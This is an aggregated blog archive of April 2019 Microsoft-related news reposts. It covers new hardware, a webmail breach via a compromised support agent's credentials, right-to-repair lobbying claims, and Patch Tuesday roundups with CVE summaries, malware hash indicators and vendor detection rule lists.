Category Archives: microsoft

Microsoft 365 security: Protecting users from an ever-evolving threat landscape

In this age of frequent security and data breaches, the statement “We take our customers’ privacy and security very seriously” has been heard from breached companies so often as to become a point of mockery, anger and frustration. But when Rob Lefferts, CVP of Microsoft 365 Security and Compliance, tells me the same thing (and the statement is not in response to a security breach), I believe him. If they didn’t, this cloud-based SaaS offering … More

The post Microsoft 365 security: Protecting users from an ever-evolving threat landscape appeared first on Help Net Security.

Microsoft’s Surface Hub 2S Starts at $8,999, Ships in June

The Surface Hub, Microsoft's digital whiteboard designed for conferences and meetings, received a hardware refresh today. From a report: At a press event at Steelcase's swanky New York City hub, the Redmond, Washington company detailed the improved Surface Hub 2S, which boasts a touchscreen that's higher in resolution than the original, plus a 4K front camera that supports video calling, an enhanced 8-microphone far-field microphone array, and other improvements. Surface 2S will ship in June, starting at $8,999 and going up to nearly $12,000. (That's the same base price as the original Surface Hub 2.) A larger version -- the Surface Hub 2S 85-inch -- will also be available at an as-yet-unrevealed price, and stands and wall mounts from Steelcase will be sold separately for $1,449.99 and $249, respectively.

Read more of this story at Slashdot.

Naked Security – Sophos: Internet Explorer browser flaw threatens all Windows users

Nearly four years after it was replaced by Edge as Microsoft’s preferred Windows browser, researchers keep finding unpleasant security flaws in Internet Explorer (IE).



Naked Security - Sophos

Microsoft Is Jumping Onto the Wireless Earbud Bandwagon, Says Report

According to a report by Brad Sams at Thurrott, Microsoft is going to expand its range of audio hardware with the introduction of a set of wireless earbuds. They will accompany the Surface Headphones, a premium-priced pair of wireless headphones that Microsoft released last year. Ars Technica reports: Microsoft has shipped earbuds before: the Zune media player came with earbuds with a feature that sounds simple but is actually ingenious: the earbuds were magnetic and would stick together back to back. The result? Much less cable tangling when you put them in your pocket or bag. Surface Headphones seem to be competitive with other noise-cancelling over-the-ear headphones: their wireless range is great, the noise cancelling is solid, and their volume and noise-cancelling dials are a joy to use, but their battery life and Bluetooth audio standard support are both weak. As such, Microsoft is not totally without experience in this area and has shown that it can engineer thoughtful, compelling designs. How the putative earbuds will stand out from the crowd remains to be seen, of course. The existing Surface Headphones were codenamed Joplin, raising the question: Janis or Scott? The earbuds make the answer to that question clear; they're apparently codenamed Morrison, as in Jim, meaning that the over-the-ear headphones are clearly named for Janis. Sams says that "Surface Buds" has been mooted as their retail name, with a possible launch in 2019.

Read more of this story at Slashdot.

Hackers snab emails and more in Microsoft Outlook, Hotmail, and MSN compromise

Long-time users of certain Microsoft products, such as Hotmail, MSN, and Outlook found they may be wrapped up in a hack grabbing snippets of email information, and in some cases, a little bit more.

Microsoft email services have been around forever in Internet time. Yet, many users still have a few Hotmail accounts rattling around. While most have long since moved on from MSN and Hotmail to Live and Outlook, all of these email accounts are still chugging away in one form or another.

Perhaps it’s an email you’ve pretty much grown up with and don’t want to let go. Maybe your old Microsoft-supplied email address is tied into large portions of the MS ecosystem, and you’d rather not start trying to reinvent the wheel. It could be you just appreciate the novelty of having a legacy email address, which is becoming rarer with each passing moment.

No matter your angle, and regardless of your stance on whether a Hotmail account is even a good idea anymore, people still make use of them.

This is where our tale of compromise woe begins.

What happened?

A customer support agent was compromised by hackers and used to gain access to certain pieces of email data. If your account was for business, you’re safe. If it was a free personal account, however, it might have been affected. As per the notification email from Microsoft, which appears to have gone out over the weekend:

Dear customer,

We have identified that a Microsoft support agent’s credentials were compromised, enabling individuals outside Microsoft to access information without your Microsoft email account. This unauthorised access could have allowed unauthorised parties to access and / or view information related to your email account (such as your email address, folder names, the subject lines of emails, and the names of other email addresses you communicate with), but not the content of any emails or attachments, between January 1st 2019 and March 28th 2019.

While Microsoft stated that no email content was pilfered, a little while after their initial reveal, they had to update their warnings to state that about 6 percent of the total affected users had, in fact, had email body content accessed.

Microsoft hasn’t revealed how many users in total were affected during the attack, which took place between January 1 and March 28, but actual email content accessed is a significant step up in severity from subject lines and contacts.

What steps did Microsoft take?

Once the attack was brought to Microsoft’s attention, they shut it down quickly. Going back to their notification email:

Upon awareness of this issue, Microsoft immediately disabled the compromised credentials, prohibiting their use for any further unauthorised access…it is important to note that your email login credentials were not directly impacted by this incident. However, out of caution, you should reset your password for your account.

They also advised users to be wary of phishing attacks and social engineering tactics in general. All the same, information is a little thin on the ground.

As TechCrunch notes, Microsoft hasn’t revealed if the support account was a third party or belonged to a Microsoft employee, or which regions were impacted—aside from a reference to the EU in one of the emails.

Additionally, Microsoft claims this took place over three months; an informant for Motherboard reckons it was more like six (which Microsoft denies).

Next steps?

At this point, we’d usually suggest security tips along the lines of changing your passwords, but this attack is tricky because it didn’t involve credentials. It seems no matter how locked down your account was, the method of attack allowed hackers to see what they wanted to see.

As Microsoft suggests, feel free to change your password if it makes you feel more reassured. If you want to boost your online webmail account security, there’s never been a better time to begin. You might also want to rethink hanging onto those dinosaur, legacy accounts, as they are huge targets for cybercriminals.

The biggest risk from this attack is most likely to the small number of users whose full email content was viewable by the hackers. With any luck, what they saw is hopefully nothing too sensitive. For our part, we recommend checking out our suggestions for spotting dubious emails to cover any potential social engineering or phishing attempts spurred by this attack.

It’s definitely bad, but it could’ve been a lot worse. The lesson we can hopefully learn from this one: Be thankful for small mercies.

The post Hackers snab emails and more in Microsoft Outlook, Hotmail, and MSN compromise appeared first on Malwarebytes Labs.

Disc-Free Xbox One S Could Land on May 7

Microsoft is about to launch an even cheaper Xbox One S. In order to cut costs, the company is removing the Blu-ray disc drive altogether. According to leaked marketing images spotted by WinFuture, the console could launch on May 7th for $258 in Germany. From a report: Given that the launch is just a few weeks away and that those marketing images line up perfectly with previous rumors, chances are this is the real deal. As you can see on WinFuture's images, it looks exactly like an Xbox One S without the disc slot. The console is called Xbox One S All Digital and comes with a 1TB hard drive -- most standard Xbox One S consoles currently also feature a 1TB hard drive. Microsoft states clearly that this console is only for digital games. If you already have physical Xbox One games, you wonâ(TM)t be able to insert them in the console.

Read more of this story at Slashdot.

Hackers Could Read Your Hotmail, MSN, and Outlook Emails by Abusing Microsoft Support

eatmorekix writes: On Saturday, Microsoft confirmed that some users of the company's email service had been targeted by hackers. A hacker or group of hackers had first broken into a customer support account for Microsoft, and then used that to gain access to information related to customers' email accounts such as the subject lines of their emails and who they've communicated with. But the issue is much worse than previously reported, with the hackers able to access email content from a large number of Outlook, MSN, and Hotmail email accounts, according to a source who witnessed the attack in action and described it before Microsoft's statement, as well as screenshots provided to Motherboard. Microsoft confirmed to Motherboard that hackers gained access to the content of some customers' emails.

Read more of this story at Slashdot.

Microsoft Halts Windows 7 And 8.1 April Updates For Some Users Due To System Crashes

Once again, Microsoft pulled updates for Windows users owing to system crash issues. However, this time, the problem does not

Microsoft Halts Windows 7 And 8.1 April Updates For Some Users Due To System Crashes on Latest Hacking News.

E Hacking News – Latest Hacker News and IT Security News: Microsoft’s email services hacked




Microsoft has confirmed a data breach by unknown hackers who might have been successful in accessing a ‘’limited’’ number of Microsoft customer’s Email.

According to the company, hackers breached the Microsoft network between January 1 and March 28 and compromised the Microsoft support agent’s credentials.

Microsoft sent an email notification to all their customer via stating, “This unauthorized access could have allowed unauthorized parties to access and/or view information related to your email account (such as your e-mail address, folder names, the subject lines of e-mails, and the names of other e-mail addresses you communicate with), but not the content of any e-mails or attachments”

The company has confirmed the incident to TechCrunch that account of users of services like @msn.com and @hotmail.com had been compromised in the recent breach, but the exact number of victims is not known. 

“We addressed this scheme, which affected a limited subset of consumer accounts, by disabling the compromised credentials and blocking the perpetrators’ access,” said a Microsoft spokesperson in an email.

Microsoft is urging all its affected users to change their passwords immediately. 






E Hacking News - Latest Hacker News and IT Security News

Microsoft’s email services hacked




Microsoft has confirmed a data breach by unknown hackers who might have been successful in accessing a ‘’limited’’ number of Microsoft customer’s Email.

According to the company, hackers breached the Microsoft network between January 1 and March 28 and compromised the Microsoft support agent’s credentials.

Microsoft sent an email notification to all their customer via stating, “This unauthorized access could have allowed unauthorized parties to access and/or view information related to your email account (such as your e-mail address, folder names, the subject lines of e-mails, and the names of other e-mail addresses you communicate with), but not the content of any e-mails or attachments”

The company has confirmed the incident to TechCrunch that account of users of services like @msn.com and @hotmail.com had been compromised in the recent breach, but the exact number of victims is not known. 

“We addressed this scheme, which affected a limited subset of consumer accounts, by disabling the compromised credentials and blocking the perpetrators’ access,” said a Microsoft spokesperson in an email.

Microsoft is urging all its affected users to change their passwords immediately. 




Microsoft Says Some Webmail Accounts Were Compromised

A "limited" number of users of Microsoft's webmail services -- which include Hotmail, Outlook.com, and MSN -- "had their accounts compromised, TechCrunch reports. "We addressed this scheme, which affected a limited subset of consumer accounts, by disabling the compromised credentials and blocking the perpetrators' access," said a Microsoft spokesperson in an email. According to an email Microsoft has sent out to affected users, malicious hackers were potentially able to access an affected user's e-mail address, folder names, the subject lines of e-mails, and the names of other e-mail addresses the user communicates with -- "but not the content of any e-mails or attachments," nor -- it seems -- login credentials like passwords. Microsoft is still recommending that affected users change their passwords regardless. The breach occurred between January 1 and March 28, Microsoft's letter to users said. The hackers got into the system by compromising a customer support agent's credentials, according to the letter. Once identified, those credentials were disabled. Microsoft told users that it didn't know what data was viewed by the hackers or why, but cautioned that users might as a result see more phishing or spam emails as a result.

Read more of this story at Slashdot.

Attackers hacked support agent to access Microsoft Outlook email accounts

Bad news for users of the Microsoft Outlook email service, hackers have compromised the Microsoft Support Agent to access their email accounts.

Earlier this year, hackers breached Microsoft’s customer support portal and gained access to some email accounts registered with the Microsoft’s Outlook service.

Microsoft notified some of its users the security breach, it confirmed via email that hackers have accessed information about their OutLook account between 1 January 2019 and 28 March 2019.

Several Reddit users confirmed to have received a data breach notification email from Microsoft and one of them published an image of the message:

Microsoft Outllok data breach

Microsoft security breach notification email states that unknown attackers were able to compromise credentials for one of Microsoft’s customer support agents. The company did not provide additional details on the way the hackers compromise the employee’s account either the number of affected accounts.

A Microsoft’s customer support agent can view account email addresses, folder names, subject lines of emails, and the email addresses a user sent messages. The attackers used compromised credentials to access information belonging to the affected accounts. The company pointed out that attackers were not able to access the content of the emails or attachments.

“Our data indicates that account-related information (but not the content of any e-mails) could have been viewed, but Microsoft has no indication why that information was viewed or how it may have been used,” reads the breach notification email.

Experts at THN highlighted that even the two-factor authentication was not able to prevent users’ accounts.

Microsoft disabled the compromised credentials:

“We addressed this scheme, which affected a limited subset of consumer accounts, by disabling the compromised credentials and blocking the perpetrators’ access.”

Microsoft recommended all users, even not affected ones, to reset the passwords for their Microsoft accounts as a precautionary measure.

“Microsoft regrets any inconvenience caused by this issue,” concludes the company. “Please be assured that Microsoft takes data protection very seriously and has engaged its internal security and privacy teams in the investigation and resolution of the issue, as well as. additional hardening of systems and processes to prevent such recurrence.”

Pierluigi Paganini

(SecurityAffairs – hacking, Microsoft Outlook)

The post Attackers hacked support agent to access Microsoft Outlook email accounts appeared first on Security Affairs.

Security Affairs: Attackers hacked support agent to access Microsoft Outlook email accounts

Bad news for users of the Microsoft Outlook email service, hackers have compromised the Microsoft Support Agent to access their email accounts.

Earlier this year, hackers breached Microsoft’s customer support portal and gained access to some email accounts registered with the Microsoft’s Outlook service.

Microsoft notified some of its users the security breach, it confirmed via email that hackers have accessed information about their OutLook account between 1 January 2019 and 28 March 2019.

Several Reddit users confirmed to have received a data breach notification email from Microsoft and one of them published an image of the message:

Microsoft Outllok data breach

Microsoft security breach notification email states that unknown attackers were able to compromise credentials for one of Microsoft’s customer support agents. The company did not provide additional details on the way the hackers compromise the employee’s account either the number of affected accounts.

A Microsoft’s customer support agent can view account email addresses, folder names, subject lines of emails, and the email addresses a user sent messages. The attackers used compromised credentials to access information belonging to the affected accounts. The company pointed out that attackers were not able to access the content of the emails or attachments.

“Our data indicates that account-related information (but not the content of any e-mails) could have been viewed, but Microsoft has no indication why that information was viewed or how it may have been used,” reads the breach notification email.

Experts at THN highlighted that even the two-factor authentication was not able to prevent users’ accounts.

Microsoft disabled the compromised credentials:

“We addressed this scheme, which affected a limited subset of consumer accounts, by disabling the compromised credentials and blocking the perpetrators’ access.”

Microsoft recommended all users, even not affected ones, to reset the passwords for their Microsoft accounts as a precautionary measure.

“Microsoft regrets any inconvenience caused by this issue,” concludes the company. “Please be assured that Microsoft takes data protection very seriously and has engaged its internal security and privacy teams in the investigation and resolution of the issue, as well as. additional hardening of systems and processes to prevent such recurrence.”

Pierluigi Paganini

(SecurityAffairs – hacking, Microsoft Outlook)

The post Attackers hacked support agent to access Microsoft Outlook email accounts appeared first on Security Affairs.



Security Affairs

Hackers Compromise Microsoft Support Agent to Access Outlook Email Accounts

If you have an account with Microsoft Outlook email service, there is a possibility that your account information has been compromised by an unknown hacker or group of hackers, Microsoft confirmed The Hacker News. Earlier this year, hackers managed to breach Microsoft's customer support portal and access information related to some email accounts registered with the company's Outlook service.

Is Microsoft Quietly Lobbying Against Right-To-Repair Legislation?

Microsoft "has been quietly lobbying against Right to Repair legislation, which would prevent Microsoft from penalizing customers when they open up their devices," claims MSPoweruser: Jeff Morris, Democratic member of the [Washington state] House of Representatives claims Microsoft has blocked legislation from being passed despite strong bipartisan support. In an interview on iFixit's Repair Radio [YouTube], Rep. Jeff Morris said that "word on the street" was that Microsoft, "marshalled forces to keep the bill from moving out of the House Rules committee." He claimed "there was a tax proposal here ... to pay for STEM education," and that "in exchange for Microsoft support[ing that tax,] having Right to Repair die..." was a condition, as well as another privacy policy Microsoft wanted to advance. The state representative hedged that "I can't confirm or deny this, because I have not seen a smoking gun." But he also told his interviewer that to paint a discouraging picture of the landscape after passage of the bill, "Microsoft was going around telling our members that they wouldn't sell Surface Tablets in Washington any longer."

Read more of this story at Slashdot.

Microsoft April Patch Tuesday Also Addresses Two Zero-Day Bugs With Numerous Others

Microsoft April Patch Tuesday updates are out with numerous bug fixes. Apart from the other vulnerabilities, Microsoft has also patched

Microsoft April Patch Tuesday Also Addresses Two Zero-Day Bugs With Numerous Others on Latest Hacking News.

Threat Source (April 11)


Newsletter compiled by Jonathan Munshaw.

Welcome to this week’s Threat Source newsletter — the perfect place to get caught up on all things Talos from the past week.

If you haven’t yet, there’s still time to register for this year’s Talos Threat Research Summit — our second annual conference by defenders, for defenders. This year’s Summit will take place on June 9 in San Diego — the same day Cisco Live kicks off in the same city. We sold out last year, so hurry to register!

We made waves this week with an article on malicious groups on Facebook. We discovered thousands of users who were offering to buy and sell various malicious services, such as carding, spamming and the creation of fake IDs. News outlets across the globe covered this story, including NBC News, Forbes and WIRED.

There’s also new research on the Gustuff malware. Researchers discovered this banking trojan earlier this year, and recently, we tracked it targeting Australian users in the hopes of stealing their login credentials to financial services websites.

Finally, we also have our weekly Threat Roundup, which you can find on the blog every Friday afternoon. There, we go over the most prominent threats we’ve seen (and blocked) over the past week.

Upcoming public engagements with Talos


Location: Salt Lake City, Utah
Date: April 25
Speaker: Nick Biasini
Synopsis: Join Nick Biasini as he takes part in a day-long education event on all things Cisco. Nick will be specifically highlighting the work that Talos does as one part of the many breakout sessions offered at Cisco Connect. This session will cover a brief overview of what Talos does and how we operate. Additionally, he'll discuss the threats that are top-of-mind for our researchers and the trends that you, as defenders, should be most concerned about.  

Cyber Security Week in Review

  • WikiLeaks founder Julian Assange was arrested in London on Thursday after being extradited from the Ecuadorian embassy. Hours later, the U.S. formally charged him with conspiracy to commit computer intrusion. WikiLeaks is responsible for leaking thousands of classified government documents over the years.
  • Amazon workers reportedly listen to some conversations with Alexa devices in order to improve the software’s voice recognition technology. A handful of employees transcribe the recordings, annotate them and then feed it back into the software.
  • Yahoo agreed to a $118 million settlement with users over a 2013 data breach. The company, which is now owned by Verizon, affected 3 billion users worldwide, but Yahoo kept it quiet for years.
  • The U.S. government released a warning regarding the new “HOPLIGHT” malware that appears to originate from North Korea. According to a report from the FBI and Department of Homeland Security, the malware has the ability to read, write and move files, connect to a remote host, and upload and download files, among other functions.
  • Verizon patched a vulnerability in some of its routers that could have allowed an attacker to gain root privileges. This could allow them to target other devices on the network, such as internet-of-things equipment. 
  • Security researchers bypassed the Samsung Galaxy S10’s fingerprint scanner with a 3-D printed model. This means that attackers could potentially steal users’ fingerprints and then be able to gain physical access to their devices.
  • Three recent spam campaigns are spreading the TrickBot malware via malicious attachments that disguise themselves as tax documents. The attackers spoof ADP and Paychex, two producers of human resources and payment software.
  • Cybersecurity companies are pledging to help users remove so-called "stalkerware" from users' smartphones. The companies say they will send alerts to users if this software, which is traditionally used to track other users, is dected on their device.

Notable recent security issues

Title: Microsoft patches 74 vulnerabilities, 14 critical
Description: Microsoft released its monthly security update Tuesday, disclosing a variety of vulnerabilities in several of its products. The latest Patch Tuesday covers 74 vulnerabilities, 16 of which are rated “critical” and 58 that are considered “important.” This release also includes a critical advisory covering a security update to Adobe Flash Player. This month’s security update covers security issues in a variety of Microsoft’s products, including the Chakra Scripting Engine, Microsoft Office and Windows 10.
Snort SIDs: 45632, 45635, 46548, 46549, 49380, 49381, 49688, 49689, 49692 - 49711, 49716 - 49723, 49727 - 49747, 49750 - 49755

Title: Adobe fixes vulnerabilities in Flash Player, Acrobat
Description: Adobe patched vulnerabilities in 15 of its products this week as part of its monthly security update. The vulnerabilities disclosed include critical memory corruption bugs in Shockwave, as well as remote code execution vulnerabilities in Acrobat Reader.
Snort SIDs: 48293, 49294

Most prevalent malware files this week

SHA 256: d05a8eaf45675b2e0cd6224723ededa92c8bb9515ec801b8b11ad770e9e1e7ed
MD5: 6372f770cddb40efefc57136930f4eb7
Typical Filename: maftask.zip
Claimed Product: N/A
Detection Name: PUA.Osx.Adware.Gt32supportgeeks::tpd

SHA 256: 3f6e3d8741da950451668c8333a4958330e96245be1d592fcaa485f4ee4eadb3
MD5: 47b97de62ae8b2b927542aa5d7f3c858
Typical Filename: qmreportupload.exe
Claimed Product: qmreportupload
Detection Name: Win.Trojan.Generic::in10.talos

SHA 256: 8f236ac211c340f43568e545f40c31b5feed78bdf178f13abe498a1f24557d56
MD5: 4cf6cc9fafde5d516be35f73615d3f00
Typical Filename: max.exe
Claimed Product: 易语言程序
Detection Name: Win.Dropper.Armadillo::1201

SHA 256: 46bc86cff88521671e70edbbadbc17590305c8f91169f777635e8f529ac21044
MD5: b89b37a90d0a080c34bbba0d53bd66df
Typical Filename: cab.exe
Claimed Product: Orgs ps
Detection Name: W32.GenericKD:Trojangen.22ek.1201

SHA 256: 790c213e1227adefd2d564217de86ac9fe660946e1240b5415c55770a951abfd
MD5: 147ba798e448eb3caa7e477e7fb3a959
Typical Filename: ups.exe
Claimed Product: TODO: <产品名>
Detection Name: W32.Variant:XMRig.22fc.1201

Top spams stats for this week

Top 5 spam subjects observed
  • "Help Desk: Planned maintenance for Tuesday 9th"
  • "Iron Mountain Australia Group Pty Ltd - Invoice Number AUS402803"
  • "Fwd: Netflix statement Of Payment."
  • "Please approve - Allina"
  • "Your Netflix Membership Has Been Suspended"
Top 5 most used ASNs for sending spam
  • 8075 Microsoft Corporation
  • 3136 State of WI Dept. of Administration
  • 6276 OVH SAS
  • 8560 1&1 Internet SE
  • 16509 Amazon.com, Inc.

Update now! Here’s the April Patch Tuesday roundup

Microsoft and Adobe Patch Tuesday updates are here. Find out more about the most serious bugs and how to patch them.

Security Affairs: Microsoft April 2019 Patch Tuesday fixes Windows 0days under attack

Microsoft Patches Windows Privilege Escalation Flaws Exploited in Attacks

Microsoft has released its April 2019 Patch Tuesday updates that address over 70 vulnerabilities, including two Windows zero-day flaws.

Microsoft has released the April 2019 Patch Tuesday updates that address 74 vulnerabilities, including two Windows zero-days under active attack.

April 2019 Patch Tuesday security updates resolve over a dozen critical remote code execution and privilege escalation vulnerabilities affecting Windows and Microsoft browsers.

The vulnerabilities exploited in the wild tracked as CVE-2019-0803 and CVE-2019-0859 could allow an attacker to escalate privileges on the target system.

April 2019 Patch Tuesday

Both vulnerabilities tied the way the Win32k component in Windows handles objects in memory, an authenticated attacker could exploit them authenticated to execute arbitrary code in kernel mode.

“An elevation of privilege vulnerability exists in Windows when the Win32k component fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.” reads the security advisor for the CVE-2019-0803 that is equal to the one for the CVE-2019-0859 flaw.

“To exploit this vulnerability, an attacker would first have to log on to the system. An attacker could then run a specially crafted application that could exploit the vulnerability and take control of an affected system.

The update addresses this vulnerability by correcting how Win32k handles objects in memory.”

The flaws were respectively discovered by researchers at Kaspersky Lab and Donghai Zhu of the Alibaba Cloud Intelligence Security Team.

Microsoft did not reveal details about the vulnerabilities and the way threat actors have exploited them.

Adobe also released its Patch Tuesday updates for April 2019 that address a total of 43 vulnerabilities affecting the eight products of the company.

Pierluigi Paganini

(SecurityAffairs – Microsoft Patch Tuesday, zero-days)

The post Microsoft April 2019 Patch Tuesday fixes Windows 0days under attack appeared first on Security Affairs.



Security Affairs

Microsoft April 2019 Patch Tuesday fixes Windows 0days under attack

Microsoft Patches Windows Privilege Escalation Flaws Exploited in Attacks

Microsoft has released its April 2019 Patch Tuesday updates that address over 70 vulnerabilities, including two Windows zero-day flaws.

Microsoft has released the April 2019 Patch Tuesday updates that address 74 vulnerabilities, including two Windows zero-days under active attack.

April 2019 Patch Tuesday security updates resolve over a dozen critical remote code execution and privilege escalation vulnerabilities affecting Windows and Microsoft browsers.

The vulnerabilities exploited in the wild tracked as CVE-2019-0803 and CVE-2019-0859 could allow an attacker to escalate privileges on the target system.

April 2019 Patch Tuesday

Both vulnerabilities tied the way the Win32k component in Windows handles objects in memory, an authenticated attacker could exploit them authenticated to execute arbitrary code in kernel mode.

“An elevation of privilege vulnerability exists in Windows when the Win32k component fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.” reads the security advisor for the CVE-2019-0803 that is equal to the one for the CVE-2019-0859 flaw.

“To exploit this vulnerability, an attacker would first have to log on to the system. An attacker could then run a specially crafted application that could exploit the vulnerability and take control of an affected system.

The update addresses this vulnerability by correcting how Win32k handles objects in memory.”

The flaws were respectively discovered by researchers at Kaspersky Lab and Donghai Zhu of the Alibaba Cloud Intelligence Security Team.

Microsoft did not reveal details about the vulnerabilities and the way threat actors have exploited them.

Adobe also released its Patch Tuesday updates for April 2019 that address a total of 43 vulnerabilities affecting the eight products of the company.

Pierluigi Paganini

(SecurityAffairs – Microsoft Patch Tuesday, zero-days)

The post Microsoft April 2019 Patch Tuesday fixes Windows 0days under attack appeared first on Security Affairs.

April 2019 Patch Tuesday: Microsoft fixes two actively exploited bugs

Microsoft has plugged 74 CVE-numbered security holes on this April 2019 Patch Tuesday, including two vulnerabilities actively exploited by attackers. All of the bugs are rated either Critical or Important. Adobe has also released security updates for many of its products, including the widely used Flash Player and Shockwave Player (the freeware software plug-in for viewing multimedia and video games in web pages). The Adobe updates Adobe has provided security updates for many software packages. … More

The post April 2019 Patch Tuesday: Microsoft fixes two actively exploited bugs appeared first on Help Net Security.

TrendLabs Security Intelligence Blog: April’s Patch Tuesday Fixes Two Vulnerabilities Being Exploited in the Wild

Microsoft’s April security update includes fixes for 74 CVEs, including two vulnerabilities that are actively exploited in the wild. Of the vulnerabilities patched in this update, 13 are rated Critical and 61 are rated Important. The patches this month cover a significant number of Microsoft products and services, namely: Internet Explorer, Edge, Windows, ChakraCore, Microsoft Office and Microsoft Office Services and Web Apps, .NET Framework and ASP.NET, Exchange Server, Visual Studio, Skype for Business, Azure DevOps Server, Open Enclave SDK, and Team Foundation Server. Two of the vulnerabilities were disclosed via the Zero Day Initiative (ZDI).

CVE-2019-0803 and CVE-2019-0859 are two Win32k Elevation of Privilege vulnerabilities actively being exploited, very similar to Win32k vulnerabilities addressed in March. If successfully exploited, these vulnerabilities could provide attackers with elevated privileges without authorization, allowing them to install programs, manipulate data, and create new accounts with full user rights.

Other notable vulnerabilities include:

  • CVE-2019-0853, a GDI+ Remote Code Execution Vulnerability. A number of Microsoft programs, notably the OS and Office suite, use the GDI+ component. Discovered by ZDI’s Hossein Lotfi, this vulnerability occurs when parsing EMF file records. A specially crafted EMF file record can trigger access of an uninitialized pointer, which allows an attacker to execute arbitrary code.
  • CVE-2019-0688, a Windows TCP/IP Information Disclosure Vulnerability. IP fragmentation has been a problem for years, and apparently remains an issue. This bug in the Windows TCP/IP stack could allow information disclosure from improperly handling fragmented IP packets. The vulnerability could expose data such as SAS token and resource IDs.

Meanwhile, Adobe has released eight patches for Acrobat and Reader, Adobe Digital Editions, Flash, Bridge CC, XD CC, Shockwave, InDesign, Dreamweaver, and Experience Manager Forms. The patch for Adobe InDesign fixes a Critically-rated Unsafe Hyperlink Processing vulnerability that could lead to arbitrary code execution. The patch for Adobe Acrobat and Reader addresses 21 CVEs, 11 of which are rated Critical. All of the Critical vulnerabilities could lead to arbitrary code execution. Adobe Shockwave also received an update for seven Critical CVEs, although it has already reached its end-of-life. Adobe will no longer provide support for Shockwave; the company has released an FAQ to guide remaining users.

The Trend Micro™ Deep Security™ and Vulnerability Protection solutions protect user systems from threats that may target the vulnerabilities addressed in this month’s Patch Tuesday via the following Deep Packet Inspection (DPI) rules:

  • 1009647-Microsoft Windows GDI Elevation Of Privilege Vulnerability (CVE-2019-0803)
  • 1009649-Microsoft Windows Multiple Security Vulnerabilities (Apr-2019)
  • 1009650-Microsoft XML Remote Code Execution Vulnerability (CVE-2019-0793)
  • 1009651-Microsoft XML Remote Code Execution Vulnerability (CVE-2019-0794)
  • 1009652-Microsoft Edge Chakra Scripting Engine Memory Corruption Vulnerability (CVE-2019-0806)
  • 1009653-Microsoft Graphics Components Remote Code Execution Vulnerability (CVE-2019-0822)
  • 1009654-Microsoft Windows VBScript Engine Remote Code Execution Vulnerability (CVE-2019-0862)
  • 1009655-Microsoft Internet Explorer Scripting Engine Memory Corruption Vulnerability (CVE-2019-0752)
  • 1009656-Microsoft Internet Explorer Scripting Engine Memory Corruption Vulnerability (CVE-2019-0753)
  • 1009657-Microsoft Edge Chakra Scripting Engine Memory Corruption Vulnerability (CVE-2019-0861)
  • 1009658-Microsoft Edge Chakra Scripting Engine Memory Corruption Vulnerability (CVE-2019-0810)
  • 1009659-Microsoft Edge Chakra Scripting Engine Memory Corruption Vulnerability (CVE-2019-0812)
  • 1009660-Microsoft Edge Chakra Scripting Engine Memory Corruption Vulnerability (CVE-2019-0829)
  • 1009661-Microsoft Edge Chakra Scripting Engine Memory Corruption Vulnerability (CVE-2019-0860)
  • 1009662-Adobe Flash Player Out-of-Bounds Read Vulnerability (CVE-2019-7108)
  • 1009663-Adobe Acrobat And Reader Multiple Security Vulnerabilities (APSB19-17) – 1
  • 1009666-Adobe Acrobat And Reader Multiple Security Vulnerabilities (APSB19-17) – 2

 

Customers who have the Trend Micro™ TippingPoint® system are protected from threats that may exploit this month’s list of vulnerabilities via these MainlineDV filters:

  • 34889: HTTP: Delta Industrial Automation CNCSoft Buffer Overflow Vulnerability (ZDI-18-1071)
  • 34899: HTTP: Adobe Flash Player MovieClip Use-After-Free Vulnerability (Upload)
  • 34901: ZDI-CAN-7273: Zero Day Initiative Vulnerability (Belkin SuperTask)
  • 34902: ZDI-CAN-7274: Zero Day Initiative Vulnerability (Belkin SuperTask)
  • 34903: ZDI-CAN-7275: Zero Day Initiative Vulnerability (Belkin SuperTask)
  • 34906: ZDI-CAN-8341: Zero Day Initiative Vulnerability (Adobe Reader DC)
  • 34912: HTTP: Adobe Flash Player attachMovie Use-After-Free Vulnerability (Upload)
  • 34914: HTTP: Adobe Flash Player attachMovie Use-After-Free Vulnerability
  • 34917: ZDI-CAN-7787: Zero Day Initiative Vulnerability (Adobe Acrobat Pro DC)
  • 34918: ZDI-CAN-7858: Zero Day Initiative Vulnerability (Adobe Acrobat Pro DC)
  • 34919: ZDI-CAN-7939: Zero Day Initiative Vulnerability (Adobe Acrobat Pro DC)
  • 34920: ZDI-CAN-8228: Zero Day Initiative Vulnerability (Adobe Acrobat Pro DC)
  • 34921: ZDI-CAN-8265: Zero Day Initiative Vulnerability (Adobe Acrobat Pro DC)
  • 34922: ZDI-CAN-8272: Zero Day Initiative Vulnerability (Adobe Acrobat Pro DC)
  • 34929: HTTP: Microsoft Scripting Engine RegExp Memory Corruption Vulnerability
  • 34930: HTTP: Microsoft Internet Explorer XSL Use-After-Free Vulnerability
  • 34931: HTTP: Microsoft Internet Explorer VBScript Integer Overflow Vulnerability
  • 34933: HTTP: Microsoft Office Protocol Handler Directory Traversal Vulnerability
  • 34936: HTTP: Microsoft Windows Chakra Scripting Engine Memory Corruption Vulnerability
  • 34937: HTTP: Microsoft Windows Chakra Scripting Engine Memory Corruption Vulnerability
  • 34938: HTTP: Microsoft Windows Chakra Scripting Engine Memory Corruption Vulnerability
  • 34939: HTTP: Microsoft Windows Win32k Use-After-Free Vulnerability
  • 34941: HTTP: Microsoft Chakra Memory Corruption Vulnerability
  • 34944: HTTP: Microsoft Windows NT KASLR Information Disclosure Vulnerability
  • 34945: HTTP: Microsoft Windows Win32K Use-After-Free Vulnerability
  • 34946: HTTP: Microsoft Chakra Memory Corruption Vulnerability
  • 34947: HTTP: Microsoft Chakra Memory Corruption Vulnerability
  • 34948: HTTP: Microsoft Internet Explorer Use-After-Free Vulnerability
  • 34949: HTTP: Microsoft Windows Win32k Use-After-Free Vulnerability
  • 34951: HTTP: Microsoft Windows GDI Use-After-Free Vulnerability
  • 34953: ZDI-CAN-8293: Zero Day Initiative Vulnerability (Adobe Acrobat Pro DC)
  • 34954: ZDI-CAN-8055: Zero Day Initiative Vulnerability (Microsoft Windows)
  • 34955: ZDI-CAN-8036: Zero Day Initiative Vulnerability (Microsoft Windows)
  • 34956: ZDI-CAN-8056: Zero Day Initiative Vulnerability (Microsoft Windows)
  • 34957: ZDI-CAN-8058: Zero Day Initiative Vulnerability (Microsoft Windows)

